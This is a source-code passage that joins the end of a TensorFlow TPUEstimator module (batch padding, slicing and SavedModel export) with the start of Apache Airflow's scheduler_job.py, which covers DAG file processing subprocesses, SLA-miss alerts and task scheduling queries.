padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None,
strip_default_attrs=False):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
strip_default_attrs: Boolean. If `True`, default-valued attributes will be
removed from the NodeDefs.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_savedmodel(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path,
strip_default_attrs)
|
scheduler_job.py
|
# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_, tuple_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from sqlalchemy.sql import expression
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, SerializedDagNotFound, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.event_scheduler import EventScheduler
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.retries import MAX_DB_RETRIES, retry_db_transaction, run_with_db_retries
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if task.sla and not isinstance(task.sla, timedelta):
raise TypeError(
f"SLA is expected to be timedelta object, got "
f"{type(task.sla)} in {task.dag_id}:{task.task_id}"
)
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join(sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas)
blocking_task_list = "\n".join(
ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure_with_callback(error=request.msg, test_mode=ti.test_mode)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
:param log: override the default Logger
:type log: logging.Logger
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: logging.Logger = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(dag_folder=self.subdir, read_dags_from_db=True, load_op_links=False)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
)
starved_pools = [pool_name for pool_name, stats in pools.items() if stats['open'] <= 0]
if starved_pools:
query = query.filter(not_(TI.pool.in_(starved_pools)))
query = query.limit(max_tis)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
session=session,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
